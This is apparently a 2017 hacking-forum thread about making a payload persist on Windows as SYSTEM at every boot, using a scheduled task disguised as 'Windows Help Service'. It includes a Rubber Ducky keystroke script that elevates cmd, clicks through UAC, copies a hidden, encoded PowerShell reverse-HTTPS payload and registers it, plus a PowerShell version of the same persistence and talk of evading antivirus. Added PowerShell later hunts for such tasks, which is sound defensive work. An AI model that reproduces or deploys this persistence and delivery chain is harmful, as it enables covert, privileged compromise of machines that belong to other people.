ThoughtfulDev, posted March 25, 2017

Hey, I just found a method to start your malicious msf (or whatever) payload as the SYSTEM user from boot. This little shell line (the shell needs to be run as administrator):

    schtasks /create /tn "Windows Help Service" /tr C:\maliciousfile.exe /sc onstart /ru SYSTEM /F

creates a task named "Windows Help Service" which runs C:\maliciousfile.exe at every startup as the SYSTEM user. Keep in mind that when using this as a payload you may need to escape the /, \ and " characters. I'm currently working on a C++ version of PSExec (Source) to get rid of the .NET Framework. Feel free to post your payload using the simple one-liner which starts your malicious file as SYSTEM every boot :)
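The same boot-time SYSTEM task, created from an elevated PowerShell with the ScheduledTasks module that ships with Windows 8 / Server 2012 and later, as an added example that is not code from the post above. The task name and executable path are the post's; the settings block is an assumption added because the defaults, with schtasks.exe as well, keep the task from starting while a laptop runs on battery, which is a common reason a "runs at every boot" task quietly never runs.

```powershell
# Added example, not code from the thread. Run from an elevated PowerShell on
# Windows 8 / Server 2012 or later (the ScheduledTasks module is built in).
# $TaskName and $Payload mirror the schtasks one-liner above.
$TaskName = 'Windows Help Service'
$Payload  = 'C:\maliciousfile.exe'

# /tr C:\maliciousfile.exe
$action = New-ScheduledTaskAction -Execute $Payload

# /sc onstart : a boot trigger; fires after the OS starts, before anyone logs on
$trigger = New-ScheduledTaskTrigger -AtStartup

# /ru SYSTEM : the LocalSystem service account (session 0, no interactive desktop)
$principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest

# Assumption, not part of the one-liner: the default settings (schtasks.exe too)
# refuse to start the task on battery power and stop it when AC power is lost.
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries `
    -DontStopIfGoingOnBatteries -StartWhenAvailable

# /F : -Force overwrites an existing task with the same name instead of failing
$task = Register-ScheduledTask -TaskName $TaskName -Action $action -Trigger $trigger `
    -Principal $principal -Settings $settings -Force

# Read back what Task Scheduler actually stored (the "Actions" tab in the GUI)
'{0} runs "{1}" as {2} (state: {3})' -f $task.TaskName, $task.Actions[0].Execute,
    $task.Principal.UserId, $task.State
```

From cmd the equivalent readback is `schtasks /query /tn "Windows Help Service" /v /fo list`; if the `/create` line itself fails, the error it prints (most often access denied from a non-elevated prompt, or an unquoted path with spaces) is the first thing to check.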
Decoy, posted March 25, 2017

3 hours ago, Shonenx333 said:
    Hey, I just found a method to start your malicious msf (or whatever) payload as the SYSTEM user from boot. [...]

This might work great with the Bunny or Twin Duck. Can this be done with PowerShell?
ThoughtfulDev, posted March 26, 2017 (thread author)

19 hours ago, Decoy said:
    This might work great with the Bunny or Twin Duck. Can this be done with PowerShell?

I don't see any reason why it couldn't. You just need, for example, a PowerShell reverse HTTPS payload which will then be started instead of maliciousfile.exe. I might make a payload tomorrow or so, but feel free to experiment :)
henna3, posted March 27, 2017

19 hours ago, Shonenx333 said:
    I don't see any reason why it couldn't. [...]

Can't wait!
chaz, posted March 27, 2017

Well done for working on this. I have made a native (C) version of PSExec (my project), but it's detected by 1 anti-virus.
ThoughtfulDev, posted March 27, 2017 (thread author)

5 hours ago, henna3 said:
    Can't wait!

I haven't done much today, maybe this week... sorry.

2 hours ago, chaz said:
    Well done for working on this. I have made a native (C) version of PSExec (my project), but it's detected by 1 anti-virus.

Nice :) My C++ version currently has 0/61, so far so good... But I need to include the C++ runtime DLL files (currently 2 as well), which is not a big deal but... meh :D I will try making a pure PowerShell version of this, since it can all be done by using bash (file copying, the Windows task, and a PowerShell reverse payload).
Decoy, posted March 27, 2017

3 hours ago, chaz said:
    Well done for working on this. I have made a native (C) version of PSExec (my project), but it's detected by 1 anti-virus.

Why did it get picked up by AV?
ThoughtfulDev, posted March 29, 2017 (thread author)

Hey, I'm done with the batch version of that... but without the check whether the user can actually run cmd as admin without entering a password :(

    REM Give the OS time to enumerate the HID device, then open the Run box
    DELAY 5000
    GUI R
    DELAY 500
    REM Launch an elevated cmd via PowerShell and accept the UAC prompt with Alt+Y
    STRING powershell -c start -verb runas cmd
    ENTER
    DELAY 1500
    ALT y
    DELAY 1000
    REM Find the drive letter of the volume labelled DUCKY and copy the payload into %cd%
    STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do copy %a\powershell_reverse_https.bat %cd%\ps.bat
    ENTER
    DELAY 500
    REM Register the copied payload as a boot-time task that runs as SYSTEM
    STRING schtasks /create /tn "Windows Help Service" /tr %cd%\ps.bat /sc onstart /ru SYSTEM /F
    ENTER
    DELAY 250
    REM Run the payload once right now, minimised, then close the elevated prompt
    STRING start /min %cd%\ps.bat
    ENTER
    DELAY 200
    STRING exit
    ENTER

It just copies your generic PowerShell payload, found in the Ducky root and named powershell_reverse_https.bat, which looks like this:

    powershell -nop -window hidden -noni -EncodedCommand ...

to the current working directory, which by default, if cmd is run as admin, is C:\Windows\System32 (or whatever drive letter you have). It then adds the PowerShell payload to run as a system task at startup as the SYSTEM user. I also have a binary version of PSExec in C++ which takes much longer to start up from the SD card (up to 6 seconds)... but it checks whether the user can even run programs as admin without having to enter the admin password. This payload right here should be finished within 6 seconds or so :) Have fun
henna3, posted March 29, 2017 (edited March 29, 2017 by henna3)

1 hour ago, Shonenx333 said:
    Hey, I'm done with the batch version of that... but without the check whether the user can actually run cmd as admin without entering a password :( [...]

For some reason the file won't start at startup. I have tested with notepad.exe and another native exe file. Is there a reason for this? Thanks
ThoughtfulDev, posted March 31, 2017 (thread author)

On 29.3.2017 at 5:58 PM, henna3 said:
    For some reason the file won't start at startup. I have tested with notepad.exe and another native exe file. Is there a reason for this? Thanks

Have a look into your Windows Task Scheduler. Search for "Windows Help Service" and make sure that the path under "Actions" is the correct path to your executable. If the task isn't even created, then try to execute the schtasks line manually in a command prompt started as admin and have a look at the output (replace %cd%\ps.bat by something using notepad). Hope this helps.
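The check described above, done from PowerShell instead of the Task Scheduler GUI, followed by a hunt for every task with the same footprint (SYSTEM principal, boot trigger) on a machine under investigation, as an added example that is not code from the thread. Get-TaskStatus uses the task name from the posts; the "outside the Windows directory" ranking in Find-SystemBootTasks is an assumed heuristic, not a rule, and the event property index in Get-TaskCreationEvents follows the 4698 event schema. Two general caveats when a task "does not start": a SYSTEM task runs in session 0, so a GUI program such as notepad.exe may well have started without ever appearing on the user's desktop (check LastRun and LastResult rather than the screen), and on Windows 8 and later with Fast Startup enabled a shutdown followed by power-on resumes the kernel from hibernation rather than booting, so an onstart trigger fires on a Restart but not on that cycle.

```powershell
# Added example, not code from the thread. Needs the ScheduledTasks module
# (Windows 8 / Server 2012 or later) and an elevated prompt to see every task.

# Resolve the path Task Scheduler will actually run: strip quotes, expand %vars%
function Resolve-TaskExecutable {
    param([string]$Execute)
    if (-not $Execute) { return '' }   # COM-handler actions have no executable
    [Environment]::ExpandEnvironmentVariables($Execute.Trim('"'))
}

# Status of one task: what the "Actions" tab shows, plus whether it ever ran.
# LastResult 0x00000000 = last run succeeded, 0x00041303 = task has never run.
function Get-TaskStatus {
    param([Parameter(Mandatory)][string]$TaskName)
    $task = Get-ScheduledTask -TaskName $TaskName -ErrorAction Stop
    $info = Get-ScheduledTaskInfo -TaskName $TaskName
    $exe  = Resolve-TaskExecutable $task.Actions[0].Execute
    [pscustomobject]@{
        Task         = $task.TaskPath + $task.TaskName
        RunsAs       = $task.Principal.UserId
        Triggers     = ($task.Triggers | ForEach-Object { $_.CimClass.CimClassName }) -join ', '
        Execute      = $exe
        Arguments    = $task.Actions[0].Arguments
        TargetExists = if ($exe) { Test-Path -LiteralPath $exe } else { $false }
        State        = $task.State
        LastRun      = $info.LastRunTime
        LastResult   = '0x{0:X8}' -f $info.LastTaskResult
    }
}

# Hunt: every task that runs as SYSTEM from a boot trigger, the footprint of
# "schtasks ... /sc onstart /ru SYSTEM". "Outside %SystemRoot%" is an assumed
# heuristic used only to rank the results; legitimate third-party tasks land there too.
function Find-SystemBootTasks {
    Get-ScheduledTask | Where-Object {
        $_.Principal.UserId -match '^(NT AUTHORITY\\)?SYSTEM$|^S-1-5-18$' -and
        ($_.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskBootTrigger' })
    } | ForEach-Object {
        $exe = Resolve-TaskExecutable $_.Actions[0].Execute
        [pscustomobject]@{
            Task           = $_.TaskPath + $_.TaskName
            Execute        = $exe
            OutsideWindows = [bool]$exe -and ($exe -notlike "$env:SystemRoot\*")
        }
    } | Sort-Object OutsideWindows -Descending
}

# Security event 4698 ("A scheduled task was created") carries the task name and
# the full task XML once "Audit Other Object Access Events" is enabled.
# Properties[4] is the TaskName field in that event's schema.
function Get-TaskCreationEvents {
    param([int]$Max = 20)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4698 } -MaxEvents $Max -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, @{ n = 'TaskName'; e = { $_.Properties[4].Value } }
}

Get-TaskStatus -TaskName 'Windows Help Service' | Format-List
Find-SystemBootTasks | Where-Object OutsideWindows | Format-Table -AutoSize
Get-TaskCreationEvents
```

Whether or not the task fires, registering it leaves two artifacts a responder will look at: the task XML under %SystemRoot%\System32\Tasks\ (here the file "Windows Help Service") and its entry under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, so a name chosen to blend in does not hide the action path stored in either.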